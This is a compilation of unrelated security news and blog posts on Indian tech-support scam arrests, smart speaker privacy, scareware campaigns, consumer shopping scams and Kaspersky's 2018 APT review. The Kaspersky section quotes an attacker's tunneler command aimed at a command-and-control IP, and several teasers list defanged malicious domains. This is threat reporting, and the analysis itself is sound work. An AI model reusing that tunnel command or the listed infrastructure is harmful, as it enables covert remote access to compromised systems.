The scammers had rented four floors of a building being operated by two scammers from Gurgaon, Narendra Pahuja and Jimmy Ashija. Their boss, who was not named by the police, allegedly operates at least five call centers. In the raid this week, 126 employees were arrested and police seized 312 workstations, as well as Rs 20 lakh in cash (about $28,500 USD).

Times of India photo 


Noida police have been cooperating very well with international authorities, as well as Microsoft, leading to more than 200 people arrested in Noida and "scores" of fake call centers shut down, including four in Sector 63. (In a case just last month, another call center was said to have stolen from 300 victims, after using online job sites Shine.com and VintechJobs.com to recruit young money seekers by having them work conducting the scams.)

In the current scam, callers already had possession of the victim's Social Security Number and full name.  This information was used to add authority to their request, which got really shady really fast.  The victim was instructed to purchase Apple iTunes Gift Cards, or Google Play Gift Cards, scratch the numbers, and read them to the call center employee.  The money was laundered through a variety of businesses in China and India before cashing out to bank accounts belonging to Pahuja and Ashija.

Noida police are advancing in their Cyber Crime skills!

As more and more cyber crime enterprises spring up in India, the assistance of their new Centers for Cyber Crime Investigation is becoming more critical to stopping fraud against Americans:

We applaud the Center for Cyber Crime Investigation in Noida


The US Embassy was quick to acknowledge the support of the newest cyber crime partners of the United States after their action at the end of November:

US Embassy to India thanks the Noida and Gurgaon Police for their help!
Another recent Times of India story from November 30, 2018, "Bogus Call Centres and Pop-up Virus Alerts - a Global Cyber Con Spun up in NCR" [NCR = National Capital Region] had more details of this trend, including this graphic:


That's at least 50 call centers shut down in just these two regions, with this week's 126 arrests being the culmination of an ongoing investigation that received data from both the FBI and Microsoft.

Local news of India reported the names of some of the gang members held in the November 29-30th action in their story नोएडा: बड़ी कंपनियों में नौकरी दिलाने के नाम पर करते थे धोखाधड़ी, 8 गिरफ्तार (Noida: Fraud, 8 arrested for giving fake jobs in the name of big companies).

Sontosh Gupta, who was the ring leader, was previously employed by an online job site, but then created his own site,  vintechjobs (dot) com, which he used to attract call center employees, many of whom were duped into serving as his scammer army without ever being compensated for their work!

Others arrested then included Mohan Kumar, Paritosh Kumar, Jitendra Kumar, Victor, Himanshu, Ashish Jawla, and Jaswinder.

During that same two-day raid, police swept through at least sixteen other call centers, according to this New York Times story, "That Virus Alert on Your Computer? Scammers in India May Be Behind It".
Ajay Pal Sharma, the senior superintendent of police, told the NYT that 50 of his officers swept through eight different call centers in Gautam Budh Nagar as part of the case.  Microsoft's Digital Crimes Unit told the Times that with 1.2 million people generating $28 Billion in India working for call centers, it isn't hard to disguise the shady callers among the legitimate businesses.

The problem is not unique to Delhi and the National Capital Region suburbs that are the current focus.  Back in July, Mumbai was in the headlines, as a massive IRS-imitating Call Center ring was broken up with the help of more great cyber crime investigators from India:

Madan Ballal, Thane Crime Branch, outside Mumbai
Police Inspector Madan Ballal had his story told as the focus of an article in Narratively, "This Indian Cop Took Down a Massive IRS Call-Center Scam".

Much more investigating and arresting needs to be done, but it is a great sign that the problem is now receiving help from an emerging new generation of Indian Cybercrime Detectives!



Smart speakers: Christmas treat or lump of coal?

Christmas is nearly upon us, and thoughts are perhaps turning to various digital presents of a “smart” nature. Home security, hubs, speakers, cameras, and mashups of all of those and more besides.

With regard to speakers, the most immediate pieces of your home are theoretically at your beck and call.

There’s lots of good advice out there in terms of what to do with your new devices. Untick boxes, increase security, perhaps eliminate the “smart” feature entirely by ripping out batteries. However, is it possible that we’re taking things a little too far? Are our concerns justified? Is there, perhaps, a somewhat happy middle ground where these devices can co-exist with us minus an endless sense of panic?

Well, probably not. But maybe we can alleviate a few fears along the way.

Accidents will happen

This is a fact of life. Nothing is 100 percent secure, and nothing is 100 percent free from errors and mishaps. While this is scant consolation if something goes disastrously wrong, accepting that nothing is perfect sometimes goes a long way.

Many of the more “oh no, now what” news stories about smart speaker devices involved an accident, or an unforeseen use of the technology at hand.

Of dollhouses, cookies, and burgers

Many reported incidents are about accidental interactions between users and their devices. Of particular note is the 2017 story of a child somehow managing to place an order for a dollhouse and cookies through Amazon’s Alexa. This became even more confusing when a TV segment apparently caused chaos with a number of additional attempted orders. It’s worth noting that none of those additional attempts seem to have resulted in purchases, so either we’re missing some crucial part of the child’s story or something genuinely malfunctioned in their home.

We also have South Park pranks, and the infamous Burger King ad triggering Google Home to tell their owner all about burgers via text read out aloud from Wikipedia. While this is humorous, it could have easily invited some incredibly dubious messages into the home given anyone can edit Wikipedia text. In fact, the ad text was indeed sabotaged. What a world.

Privacy problems

Accidental recordings are perhaps the biggest potential problem, and certainly most likely to cause a privacy issue. In May 2018, a series of miscues caused private conversations to be sent to a random contact via an Echo speaker. This is, of course, horrendous and could easily have ended in disaster depending on context.

It’s also essential that device owners read all EULAs and privacy policies thoroughly. They’re complicated enough for simple mobile games, without pondering the ramifications of real-world interactions. As I mentioned on Top 10 VPN’s Privacy Central article about this very subject, even if you read through a lot of legal words, there’s no guarantee everything won’t change while you’re not looking.

Listen closely?

The potential threat of always listening devices is prone to overhyping. The biggest issue tends to be accidental activation, from adverts or background noise. It’s rare for speakers to malfunction and listen of their own accord.

Owners may wish to disallow voice-activated devices from being able to lock or unlock entry points into the house, as this is an area of deliberate activation which could cause the most harm. They certainly don’t collect everything said and are deliberately set up to avoid it. Grabbing everything 24/7 would mean device manufacturers simply couldn’t cope with all the data, so it’s in their best interests to be as concise and targeted as possible.

As evidenced by Mozilla’s recent “Privacy not included” list, people seem to have a strong aversion to smart speakers. Amazon and Google’s devices are currently rated “super creepy” by voters, whereas the only smart speaker to have a positive “not creepy” rating at all is the open source Mycroft Mark 1. With a lack of insight into how closed systems are operating inside the home, it perhaps makes sense that people would turn to open source devices where they can get a better understanding of what’s happening instead.

What’s the biggest area of concern?

As I’ve mentioned previously, I believe rogue IoT devices pose the biggest threat to victims of domestic abuse. This is due to ease of access to devices on the part of the malicious individual. The ability to control aspects of the home down to the smallest detail is a potential nightmare scenario. There are ways to combat this, but it’s risky and we always suggest professional support and assistance wherever possible.

Who speaks the truth?

All we can do is look at the evidence on offer and make an informed decision. If you’re okay with the possibility of occasional accidental misfires or mischievous triggers, you’re good to go. We can’t pretend these devices won’t continue to make their way into our homes. What we can do is ensure we take steps to limit harm wherever possible. Keep on top of possible threats as and when they surface, and you’ll hopefully have no problems this festive season.

The post Smart speakers: Christmas treat or lump of coal? appeared first on Malwarebytes Labs.

Dancho Danchev – Cyber Threat Analyst – Join Me on Patreon Community!

Dear blog readers, In the true spirit of the Christmas season I decided to let everyone know that I've recently launched my own Patreon Community Page with the idea to let everyone know that I'm currently busy crowd-funding a high-profile upcoming Cyber Security Investment Project - and I would love to hear from you more details about your thoughts regarding new Tier Features and whether or

Pay-Per-Exploit Acquisition Vulnerability Programs – Pros and cons?

As ZERODIUM starts paying premium rewards to security researchers to acquire their previously unreported zero-day exploits affecting multiple operating systems software and/or devices a logical question emerges in the context of the program's usefulness the potential benefits including potential vulnerabilities within the actual acquisition process - how would the program undermine the

Historical OSINT – Malicious Economies of Scale – The Emergence of Efficient Platforms for Exploitation – 2007

Dear blog readers, it's been several years since I last posted a quality update following my 2010 disappearance. As it's been quite a significant period of time since I last posted a quality update, I feel it's about time I post a quality update by detailing the Web Malware Exploitation market segment circa 2007 prior to my visit to the GCHQ as an independent contractor with the Honeynet Project.

Historical OSINT – Massive Blackhat SEO Campaign Spotted in the Wild Serves Scareware

It's 2010 and I've recently stumbled upon a currently active and circulating malicious and fraudulent blackhat SEO campaign successfully enticing hundreds of thousands globally into interacting with a multitude of rogue and malicious software also known as scareware. In this post I'll profile the campaign, discuss in-depth the tactics, techniques and procedures of the cybercriminals behind it and

Historical OSINT – A Diversified Portfolio of Fake Security Software Spotted in the Wild

It's 2010 and I've recently stumbled upon yet another malicious and fraudulent domain portfolio serving a variety of fake security software also known as scareware potentially exposing hundreds of thousands of users to a variety of fake security software with the cybercriminals behind the campaign potentially earning fraudulent revenue largely relying on the utilization of an affiliate-network

Historical OSINT – A Diversified Portfolio of Fake Security Software

It's 2010 and I've recently stumbled upon a currently active and circulating malicious and fraudulent portfolio of fake security software also known as scareware potentially enticing hundreds of thousands of users to a multitude of malicious software with the cybercriminals behind the campaign potentially earning fraudulent revenue in the process of monetizing access to malware-infected hosts

Historical OSINT – Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware

It's 2008 and I've recently stumbled upon a currently active malicious and fraudulent blackhat SEO campaign successfully enticing users into falling victim to fake security software also known as scareware including a variety of dropped fake codecs largely relying on the acquisition of legitimate traffic through active blackhat SEO campaigns in this particular case various North Korea news

Historical OSINT – Spamvertized Swine Flu Domains – Part Two

It's 2010 and I recently came across a currently active diverse portfolio of Swine Flu related domains further enticing users into interacting with rogue and malicious content. In this post I'll profile and expose a currently active malicious domains portfolio currently circulating in the wild successfully involved in an ongoing variety of Swine Flu malicious spam campaigns and will

Historical OSINT – Yet Another Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware

It's 2010 and I recently came across a currently active malicious and fraudulent blackhat SEO campaign successfully enticing users into interacting with rogue and fraudulent scareware-serving malicious and fraudulent campaigns. In this post I'll provide actionable intelligence on the infrastructure behind the campaign. Related malicious domains known to have participated in the campaign:

Historical OSINT – Yet Another Massive Blackhat SEO Campaign Spotted in the Wild

It's 2010 and I've recently stumbled upon yet another diverse portfolio of blackhat SEO domains this time serving rogue security software also known as scareware to unsuspecting users with the cybercriminals behind the campaign successfully earning fraudulent revenue in the process of monetizing access to malware-infected hosts largely relying on the utilization of an affiliate-network based type

Historical OSINT – Profiling a Portfolio of Active 419-Themed Scams

It's 2010 and I've recently decided to provide actionable intelligence on a variety of 419-themed scams in particular the actual malicious actors behind the campaigns with the idea to empower law enforcement and the community with the necessary data to track down and prosecute the malicious actors behind these campaigns. Related malicious and fraudulent emails known to have participated in the

Historical OSINT – Rogue Scareware Dropping Campaign Spotted in the Wild Courtesy of the Koobface Gang

It's 2010 and I recently came across a diverse portfolio of fake security software also known as scareware courtesy of the Koobface gang in what appears to be a direct connection between the gang's activities and the Russian Business Network. In this post I'll provide actionable intelligence on the infrastructure behind it and discuss in-depth the tactics, techniques and procedures of the

Historical OSINT – Massive Blackhat SEO Campaign Spotted in the Wild – Part Two

It's 2008 and I recently came across a massive black hat SEO campaign successfully enticing users into falling victim to a fraudulent and malicious scareware-serving campaign. In this post I'll provide actionable intelligence on the infrastructure behind it. Related malicious domains and redirectors known to have participated in the campaign: hxxp://msh-co.com hxxp://incubatedesign.com

Historical OSINT – Massive Blackhat SEO Campaign Spotted in the Wild

It's 2008 and I recently came across a pretty decent portfolio of rogue and fraudulent malicious scareware-serving domains successfully acquiring traffic through a variety of black hat SEO techniques, in this particular case the airplane crash of the Polish president. Related malicious domains known to have participated in the campaign: hxxp://sarahscandies.com hxxp://armadasur.com hxxp://

Historical OSINT – Malware Domains Impersonating Google

It's 2008 and I've recently stumbled upon a currently active typosquatted portfolio of malware-serving domains successfully impersonating Google further spreading malicious software to hundreds of thousands of unsuspecting users. In this post I'll provide actionable intelligence on the infrastructure behind the campaign. Related malicious domains known to have participated in the campaign:

Historical OSINT – Massive Scareware Dropping Campaign Spotted in the Wild

It's 2008 and I've recently spotted a currently circulating malicious and fraudulent scareware-serving malicious domain portfolio which I'll expose in this post with the idea to share actionable threat intelligence with the security community further exposing and undermining the cybercrime ecosystem the way we know it potentially empowering security researchers and third-party vendors with the

Historical OSINT – Latvian ISPs, Scareware, and the Koobface Gang Connection

It's 2010 and we've recently stumbled upon yet another malicious and fraudulent campaign courtesy of the Koobface gang actively serving fake security software also known as scareware to a variety of users with the majority of malicious software conveniently parked within 79.135.152.101 - AS2588, LatnetServiss-AS LATNET ISP successfully hosting a diverse portfolio of fake security software. In

Historical OSINT – Massive Blackhat SEO Campaign Courtesy of the Koobface Gang Spotted in the Wild

It's 2010 and I've recently stumbled upon yet another massive blackhat SEO campaign courtesy of the Koobface gang successfully exposing hundreds of thousands of users to a multitude of malicious software. In this post I'll provide actionable intelligence on the infrastructure behind it and discuss in depth the tactics, techniques and procedures of the cybercriminals behind it. Sample

Historical OSINT – PhishTube Twitter Broadcast Impersonated Scareware Serving Twitter Accounts Circulating

It's 2010 and I've recently intercepted a currently circulating malicious and fraudulent malware-serving spam campaign successfully enticing hundreds of thousands of users globally into interacting with the rogue and malicious software found on the compromised hosts in combination with a currently active Twitter malware-serving campaign successfully enticing users into interacting with the rogue 

Historical OSINT – Chinese Government Sites Serving Malware

It's 2008 and I'm stumbling upon yet another decent portfolio of compromised malware-serving Chinese government Web sites. In this post I'll discuss in-depth the campaign and provide actionable intelligence on the infrastructure behind it. Compromised Chinese government Web site: hxxp://nynews.gov.cn Sample malicious domains known to have participated in the campaign: hxxp://game1983.com/

Cyber Security Project Investment Proposal – DIA Needipedia – Fight Cybercrime and Cyber Jihad With Sensors – Grab Your Copy Today!

Dear blog readers, I decided to share with everyone a currently pending project investment proposal regarding the upcoming launch of a proprietary Technical Collection analysis platform with the project proposal draft available on request part of DIA's Needipedia Project Proposal Investment draft or eventually through the Smith Richardson Foundation. In case you're interested in working with me

Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online

It was the last item on my list and Christmas was less than a week away. I was on the hunt for a white Northface winter coat for my teenage daughter, which she had duly ranked as the most-important-die-if-I-don’t-get-it item on her wishlist that year.

After fighting the crowds and scouring the stores to no avail, I went online, stressed and exhausted with my credit card in hand looking for a deal and a Christmas delivery guarantee.

Mistake #1: I was under pressure and cutting it way too close to Christmas.
Mistake #2: I was stressed and exhausted.
Mistake #3: I was adamant about getting the best deal.

Gimme a deal!

It turns out these mistakes created the perfect storm for a scam. I found a site with several name-brand coats available at lower prices. I was thrilled to find the exact white coat and guaranteed delivery by Christmas. The cyber elves were working on my behalf for sure!

Only the coat never came and I was out $150.

In my haste and exhaustion, I overlooked a few key things about this “amazing” site that played into the scam. (I won’t harp on the part about me calling customer service a dozen times, writing as many emails, and feeling incredibly stupid over my careless clicking!)

Stress = Digital Risk

I’m not alone in my holiday behaviors it seems. A recent McAfee survey, Stressed Holiday Online Shopping, reveals, unfortunately, that when it comes to online shopping, consumers are often more concerned about finding a deal online than they are with protecting their cybersecurity in the process. 

Here are the kinds of risks stressed consumers are willing to take to get a holiday deal online:

  • 53% think the financial stress of the holidays can lead to careless shopping online.
  • 56% said that they would use a website they were unfamiliar with if it meant they would save money.
  • 51% said they would purchase an item from an untrusted online retailer to get a good deal.
  • 31% would click on a link in an email to get a bargain, regardless of whether they were familiar with the sender.
  • When it comes to sharing personal information to get a good deal: 39% said they would risk sharing their email address, 25% would wager their phone number, and 16% would provide their home address.

3 Tips to Safer Online Shopping:

  • Connect with caution. Using public Wi-Fi might seem like a good idea at the moment, but you could be exposing your personal information or credit card details to cybercriminals eavesdropping on the unsecured network. If public Wi-Fi must be used to conduct transactions, use a virtual private network (VPN) to help ensure a secure connection.
  • Slow down and think before you click. Don’t be like me, exhausted and desperate while shopping online — think before you click! Cybercriminals love to target victims by using phishing emails disguised as holiday savings or shipping notifications to lure consumers into clicking links that could lead to malware, or a phony website designed to steal personal information. Check directly with the source to verify an offer or shipment.
  • Browse with security protection. Use comprehensive security protection that can help protect devices against malware, phishing attacks, and other threats. Protect your personal information by using a home solution that keeps your identity and financial information secure.
  • Take a nap, stay aware. This may not seem like an important cybersecurity move, but during the holiday rush, stress and exhaustion can wear you down and contribute to poor decision-making online. Outsmarting the cybercrooks means awareness and staying ahead of the threats.

I learned the hard way that holiday stress and shopping do not mix and can easily compromise my online security. I lost $150 that day and I put my credit card information (promptly changed) firmly into a crook’s hands. I hope by reading this, I can help you save far more than that.

Here’s wishing you and your family the Happiest of Holidays! May all your online shopping be merry, bright, and secure from all those pesky digital Grinches!

The post Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online appeared first on McAfee Blogs.

Attention Red Dead Redemption 2 Players: Dodge This New Download Scam

Rockstar Games’ Red Dead Redemption 2 has struck a popular chord with many online gamers. Unfortunately, the Western-themed action-adventure game has also become a popular vessel for malicious activity among cybercriminals as well. Scammers are tricking gamers into giving up their personal information with phony “free” downloads of the online game, while simultaneously making a profit on these downloads.

You’re probably wondering how exactly this scam works. It first begins with cybercriminals planting their phony download traps in ads on platforms like YouTube, Twitter, and blog postings. With other, less sophisticated scams, a user would be prompted to install several bundled applications at this point, each one generating revenue for the scammer. But this scheme works a little bit differently. When the user clicks on the “download” button, they are presented with a fake install screen showing the progression of the game’s download process. The fake install takes about an hour to complete, further giving the illusion that a large file is actually being downloaded on the user’s device.

Once the fake installation is complete, the user is asked to enter a nonexistent license key (a pattern of numbers and/or letters provided to licensed users of a software program). If a user clicks on one of the buttons on this screen, they are redirected to a website asking for human verification in the form of surveys and questionnaires. These surveys trick the user into divulging their personal information for the cybercriminal’s disposal. What’s more, the scammer earns revenue for their malicious acts.

Because this scheme tricks users into handing over their personal information, it affects a victim’s overall privacy. Luckily, there are steps users can take to combat this threat:

  • Browse with caution. Many scammers target gamers through popular websites like YouTube and Twitter to push out malicious content. Use discretion when browsing these websites.
  • Only download content from trusted sources. If you come across a download offer that seems too good to be true, it probably is. Only download software from legitimate sources and avoid sites if you can’t tell whether they are trustworthy or not.
  • Use security software to browse the internet. Sometimes, it can be hard to distinguish whether a site is malicious or not. Security solutions like McAfee WebAdvisor can detect the URLs and scam installers associated with this threat.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Attention Red Dead Redemption 2 Players: Dodge This New Download Scam appeared first on McAfee Blogs.

Kaspersky Security Bulletin 2018. Top security stories

Introduction

The internet is now woven into the fabric of our lives. Many people routinely bank, shop and socialize online, and the internet is the lifeblood of commercial organizations. The dependence on technology of governments, businesses and consumers provides a broad attack surface for attackers with all kinds of motives – financial theft, theft of data, disruption, damage, reputational damage or simply ‘for the lulz’. The result is a threat landscape that ranges from highly sophisticated targeted attacks to opportunistic cybercrime. All too often, both rely on manipulating human psychology as a way of compromising entire systems or individual computers. Increasingly, the devices targeted also include those that we don’t consider to be computers – from children’s toys to security cameras. Here is our annual round-up of major incidents and key trends from 2018.

Targeted attack campaigns

At this year’s Security Analyst Summit we reported on Slingshot – a sophisticated cyber-espionage platform that has been used to target victims in the Middle East and Africa since 2012. We discovered this threat – which rivals Regin and ProjectSauron in its complexity – during an incident investigation. Slingshot uses an unusual (and, as far as we know, unique) attack vector: many of the victims were attacked by means of compromised MikroTik routers. The exact method for compromising the routers is not clear, but the attackers have found a way to add a malicious DLL to the device: this DLL is a downloader for other malicious files that are then stored on the router. When a system administrator logs in to configure the router, the router’s management software downloads and runs a malicious module on the administrator’s computer. Slingshot loads a number of modules on a compromised computer, but the two most notable are Cahnadr and GollumApp – which are, respectively, kernel mode and user mode modules. Together, they provide the functionality to maintain persistence, manage the file system, exfiltrate data and communicate with the C2 (command-and-control) server. The samples we looked at were marked as ‘version 6.x’, suggesting that the threat has existed for a considerable length of time. The time, skill and cost involved in creating Slingshot indicates that the group behind it is likely to be highly organized and professional, and probably state sponsored.

Soon after the start of the Winter Olympics in Pyeongchang, we began receiving reports of malware attacks on infrastructure related to the games. Olympic Destroyer shut down display monitors, killed Wi-Fi and took down the Olympics website – preventing visitors from printing tickets. The attack also affected other organizations in the region – for example, ski gates and ski lifts were disabled at several South Korean ski resorts. Olympic Destroyer is a network worm, the main aim of which is to wipe files from remote network shares of its victims. In the days that followed the attack, research teams and media companies around the world variously attributed the attack to Russia, China and North Korea – based on a number of features previously attributed to cyber-espionage and sabotage groups allegedly based in those countries or working for the governments of those countries. Our own researchers were also trying to understand which group was behind the attack. At one stage during our research, we discovered something that seemed to indicate that the Lazarus group was behind the attack. We found a unique trace left by the attackers that exactly matched a previously known Lazarus malware component. However, the lack of obvious motive and inconsistencies with known Lazarus TTPs (tactics, techniques and procedures) that we found during our on-site investigation at a compromised facility in South Korea led us to look again at this artefact. When we did so, we discovered that the set of features didn’t match the code – it had been forged to perfectly match the fingerprint used by Lazarus. So we concluded that the ‘fingerprint’ was a very sophisticated false flag, intentionally placed inside the malware in order to give threat hunters the impression that they had found a ‘smoking gun’ and diverting them from a more accurate attribution.

Figure: OlympicDestroyer component relations

We continued to track this APT group’s activities and noticed in June that they had started a new campaign with a different geographical distribution and using new themes. Our telemetry, and the characteristics of the spear-phishing documents we analysed, indicated that the attacker behind Olympic Destroyer was targeting financial and biotechnology-related organizations based in Europe – specifically, Russia, the Netherlands, Germany, Switzerland and Ukraine. The earlier Olympic Destroyer attacks – designed to destroy and paralyze the infrastructure of the Winter Olympic Games and related supply chains, partners and venues – were preceded by a reconnaissance operation. This suggested to us that the new activities were part of another reconnaissance stage that would be followed by a wave of destructive attacks with new motives. The variety of financial and non-financial targets could indicate that the same malware was being used by several groups with different interests. This could also be the result of cyberattack outsourcing, which is not uncommon among nation-state threat actors. However, it’s also possible that the financial targets are another false-flag operation by a threat actor that has already shown that they excel at this.

In April, we reported the workings of Operation Parliament, a cyber-espionage campaign aimed at high-profile legislative, executive and judicial organizations around the world – with its main focus in the Middle East and North Africa region, especially Palestine. The attacks, which started early in 2017, targeted parliaments, senates, top state offices and officials, political science scholars, military and intelligence agencies, ministries, media outlets, research centers, election commissions, Olympic organizations, large trading companies and others. The targeting of victims was unlike that of previous campaigns in the region (Gaza Cybergang or Desert Falcons) and points to an elaborate information-gathering exercise that was carried out prior to the attacks (physical and/or digital). The attackers have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their C2 servers. The attacks slowed down after the start of 2018, probably because the attackers achieved their objectives.

We have continued to track the activities of Crouching Yeti (aka Energetic Bear), an APT group that has been active since at least 2010, mainly targeting energy and industrial companies. The group targets organizations around the world, but with a particular focus on Europe, the US and Turkey – the latter being a new addition to the group’s interests during 2016-17. The group’s main tactics include sending phishing emails with malicious documents and infecting servers for different purposes, including hosting tools and logs and watering-hole attacks. Crouching Yeti’s activities against US targets have been publicly discussed by US-CERT and the UK National Cyber Security Centre (NCSC). In April, Kaspersky Lab ICS CERT provided information on identified servers infected and used by Crouching Yeti and presented the findings of an analysis of several web servers compromised by the group during 2016 and early 2017. You can read the full report here, but below is a summary of our findings.

  1. With rare exceptions, the group’s members get by with publicly available tools. The use of publicly available utilities by the group to conduct its attacks renders the task of attack attribution without any additional group ‘markers’ very difficult.
  2. Potentially, any vulnerable server on the internet is of interest to the attackers when they want to establish a foothold in order to develop further attacks against target facilities.
  3. In most cases that we have observed, the group performed tasks related to searching for vulnerabilities, gaining persistence on various hosts, and stealing authentication data.
  4. The diversity of victims may indicate the diversity of the attackers’ interests.
  5. It can be assumed with some degree of certainty that the group operates in the interests of or takes orders from customers that are external to it, performing initial data collection, the theft of authentication data and gaining persistence on resources that are suitable for the attack’s further development.

In May, researchers from Cisco Talos published the results of their research into VPNFilter, malware used to infect different brands of router – mainly in Ukraine, although affecting routers in 54 countries in total. You can read their analysis here and here. Initially, they believed that the malware had infected around 500,000 routers – Linksys, MikroTik, Netgear and TP-Link networking equipment in the small office/home office (SOHO) sector, and QNAP network-attached storage (NAS) devices. However, it later became clear that the list of affected device models was much longer – 75 in total, including ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE. The malware is capable of bricking the infected device, executing shell commands for further manipulation, creating a TOR configuration for anonymous access to the device or configuring the router’s proxy port and proxy URL to manipulate browsing sessions. However, it also spreads into networks supported by the device, thereby extending the scope of the attack. Researchers from our Global Research and Analysis Team (GReAT) took a detailed look at the C2 mechanism used by VPNFilter. One of the interesting questions is who is behind this malware. Cisco Talos indicated that a state-sponsored or state affiliated threat actor is responsible. In its affidavit for sink-holing the C2, the FBI suggests that Sofacy (aka APT28, Pawn Storm, Sednit, STRONTIUM, and Tsar Team) is the culprit. There is some code overlap with the BlackEnergy malware used in previous attacks in Ukraine (the FBI’s affidavit makes it clear that they see BlackEnergy (aka Sandworm) as a sub-group of Sofacy).

Sofacy is a highly active and prolific cyber-espionage group that Kaspersky Lab has been tracking for many years. In February, we published an overview of Sofacy activities in 2017, revealing a gradual move away from NATO-related targets at the start of 2017, towards targets in the Middle East, Central Asia and beyond. Sofacy uses spear-phishing and watering-hole attacks to steal information, including account credentials, sensitive communications and documents. This threat actor also makes use of zero-day vulnerabilities to deploy its malware.

Sofacy deploys different tools for different target profiles. Early in 2017 the group’s Dealer’s Choice campaign was used to target military and diplomatic organizations (mainly in NATO countries and Ukraine). Later in the year, the group used other tools from its arsenal, Zebrocy and SPLM, to target a broader range of organizations, including science and engineering centers and press services, with more of a focus on Central Asia and the Far East. Like other sophisticated threat actors, Sofacy continually develops new tools, maintains a high level of operational security and focuses on making its malware hard to detect. Once any signs of activity by an advanced threat actor such as Sofacy have been found in a network, it’s important to review logins and unusual administrator access on systems, thoroughly scan and sandbox incoming attachments, and maintain two-factor authentication for services such as email and VPN access. The use of APT intelligence reports, threat hunting tools such as YARA and advanced detection solutions such as KATA (Kaspersky Anti Targeted Attack Platform) will help you to understand their targeting and provide powerful ways of detecting their activities.

Our research shows that Sofacy is not the only threat actor operating in the Far East and this sometimes results in a target overlap between very different threat actors. We have seen cases where the Sofacy Zebrocy malware has competed for access to victims’ computers with the Russian-speaking Mosquito Turla clusters; and where its SPLM backdoor has competed with the traditional Turla and Chinese-speaking Danti attacks. The shared targets included government administration, technology, science and military-related organizations in or from Central Asia. The most intriguing overlap is probably that between Sofacy and the English-speaking threat actor behind the Lamberts family. The connection was discovered after researchers detected the presence of Sofacy on a server that threat intelligence had previously identified as compromised by Grey Lambert malware. The server belongs to a Chinese conglomerate that designs and manufactures aerospace and air defense technologies. However, in this case the original SPLM delivery vector remains unknown. This raises a number of hypothetical possibilities, including the fact that Sofacy could be using a new, and as yet undetected, exploit or a new strain of its backdoor, or that Sofacy somehow managed to harness Grey Lambert’s communication channels to download its malware. It could even be a false flag, planted during the previous Lambert infection. We think that the most likely answer is that an unknown new PowerShell script or legitimate but vulnerable web app was exploited to load and execute the SPLM code.

In June, we reported an ongoing campaign targeting a national data centre in Central Asia. The choice of target was especially significant – it means that the attackers were able to gain access to a wide range of government resources in one fell swoop. We think they did this by inserting malicious scripts into the country’s official websites in order to conduct watering-hole attacks. We attribute this campaign to the Chinese-speaking threat actor, LuckyMouse (aka EmissaryPanda and APT27) because of the tools and tactics used in the campaign, because the C2 domain – ‘update.iaacstudio[.]com’ – was previously used by this group and because they have previously targeted government organizations, including Central Asian ones. The initial infection vector used in the attack against the data center is unclear. Even where we observed LuckyMouse using weaponized documents with CVE-2017-11882 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we couldn’t prove that they were related to this particular attack. It’s possible that the attackers used a watering hole to infect data center employees.

We reported another LuckyMouse campaign in September. Since March, we had found several infections where a previously unknown Trojan was injected into the ‘lsass.exe’ system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy. Interestingly, this driver is signed with a digital certificate that belongs to the Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT. This campaign targeted Central Asian government organizations and we believe the attack was linked to a high-level meeting in the region. The choice of the Earthworm tunneler used in the attack is typical for Chinese-speaking actors. Also, one of the commands used by the attackers (‘-s rssocks -d 103.75.190[.]28 -e 443’) creates a tunnel to a previously known LuckyMouse C2 server. The choice of victims in this campaign also aligns with the previous interests shown by this threat actor. We did not see any indications of spear-phishing or watering-hole activity: and we think that the attackers spread their infectors through networks that were already compromised.

Lazarus is a well-established threat actor that has conducted cyber-espionage and cybersabotage campaigns since at least 2009. In recent years, the group has launched campaigns against financial organizations around the globe. In August we reported that the group had successfully compromised several banks and infiltrated a number of global crypto-currency exchanges and fintech companies. While assisting with an incident response operation, we learned that the victim had been infected with the help of a Trojanized crypto-currency trading application that had been recommended to the company over email. An unsuspecting employee had downloaded a third-party application from a legitimate looking website, infecting their computer with malware known as Fallchill, an old tool that Lazarus has recently started using again. It seems as though Lazarus has found an elaborate way to create a legitimate looking site and inject a malicious payload into a ‘legitimate looking’ software update mechanism – in this case, creating a fake supply chain rather than compromising a real one. At any rate, the success of the Lazarus group in compromising supply chains suggests that it will continue to exploit this method of attack. The attackers went the extra mile and developed malware for non-Windows platforms – they included a Mac OS version and the website suggests that a Linux version is coming soon. This is probably the first time that we’ve seen this APT group using malware for Mac OS. It looks as though, in the chase after advanced targets, software developers from supply chains and some high-profile targets, threat actors are forced to develop Mac OS malware tools. The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms. You can read our report on Operation AppleJeus here.

Turla (aka Venomous Bear, Waterbug, and Uroboros) is best known for what was, at the time, an ultra-complex Snake rootkit focused on NATO-related targets. However, this threat actor’s activity is much broader. In October, we reported on the Turla group’s recent activities, revealing an interesting mix of old code, new code, and new speculations as to where they will strike next and what they will shed. Much of our 2018 research focused on the group’s KopiLuwak JavaScript backdoor, new variants of the Carbon framework and Meterpreter delivery techniques. Other interesting aspects were the changing Mosquito delivery techniques, customized PoshSec-Mod open-source PowerShell use and borrowed injector code. We tied some of this activity together with infrastructure and data points from WhiteBear and Mosquito infrastructure and activity in 2017 and 2018. One interesting aspect of our research was the lack of ongoing targeting overlap with other APT activity. Turla was absent from the milestone DNC hack event – where Sofacy and CozyDuke were both present – but the group was quietly active around the globe on other projects. This provides some insight into the ongoing motivations and ambitions of the group. It is interesting that data related to these organizations has not been weaponized and found online while this Turla activity quietly carries on. Both Mosquito and Carbon projects focus mainly on diplomatic and foreign affairs targets, while WhiteAtlas and WhiteBear activity stretched across the globe to include organizations related to foreign affairs, but not all targeting has consistently followed this profile: the group also targeted scientific and technical centres, along with organizations outside the political arena. The group’s KopiLuwak activity does not necessarily focus on diplomatic and foreign affairs. Instead, 2018 activity targeted government-related scientific and energy research organizations and a government-related communications organization in Afghanistan. This highly selective but wider targeting set will probably continue into 2019.

